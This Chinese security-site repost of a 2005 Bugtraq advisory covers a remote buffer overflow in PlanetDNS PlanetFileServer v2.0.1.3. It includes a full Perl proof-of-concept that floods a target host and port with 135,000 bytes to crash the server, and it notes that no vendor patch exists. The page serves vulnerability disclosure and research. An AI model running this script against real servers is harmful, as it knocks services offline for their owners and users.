 |
PlanetDNS PlanetFileServer远程缓冲区溢出漏洞 |
|
|
| PlanetDNS PlanetFileServer远程缓冲区溢出漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 11:09:02 |
|
发布日期:2005-07-05
更新日期:2005-07-05
受影响系统:
PlanetDNS PlanetFileServer v2.0.1.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 14138
planetdns是一款商业程序,允许用户即使只有动态IP地址的情况下在自己电脑上建立WEB、FTP、邮件等服务器。
PlanetFileServer在处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击或执行任意指令。
向服务器发送超过134891字节的请求数据时会导致服务器发生溢出。
<*来源:fRoGGz (unsecure@writeme.com)
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
# Vulnerability: Denial Of Service - Crash
# Discovered on: June 28, 2005
# Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
# ----------- // Registers // -----------
# Dynamic Library Link of "NewAce Corporation" called "mshftp.dll" is the real problem.
# varmodAddVariable() returned error code %d
# EAX 0163D940
# ECX 41414141
# EDX 784751B6
# EBX 0163FFDC
# ESP 0163D8A8
# EBP 0163D8C8
# ESI 0163D968
# EDI 00000400
# EIP 41414141
# ------------------------------------
use IO::Socket;
use strict;
if(!$ARGV[1]) {
die "Utilisation: perl -w pfsdos.pl /n";
}
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],PeerPort => $ARGV[1],Proto => "TCP"))
{
print "/n/nPlanetDNS Software - PlanetFileServer v2.0.1.3/r/n";
print "Denial Of Service - Crash Vulnerability/r/n";
print "---------------------------------------------/r/n";
print "Discovered & coded by fRoGGz - SecuBox Labs/r/n/n";
print "[+] Connexion sur $ARGV[0]:$ARGV[1] .../r/n";
print "[+] Envoi du buffer malicieux.";
# On our config the value "134891" is the min for DoS, but more is better for a great successfull exploitation.
# Security Filter Option used 7 levels, so ....
# If you change levels to the max you must set the buffer size or use this PoC 2 times, it works well.
print $socket "/x41" x 135000 . "/r/n";
close($socket);
}
else
{
print "[-] Impossible de se connecter sur $ARGV[0]:$ARGV[1]/n";
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
PlanetDNS
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.planetdns.net/【转自世纪安全网 http://www.21safe.com】
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: 在Windows Server 2003中配置DNS系统
下一篇文章: 芬兰研究人员称多种DNS管理软件有漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
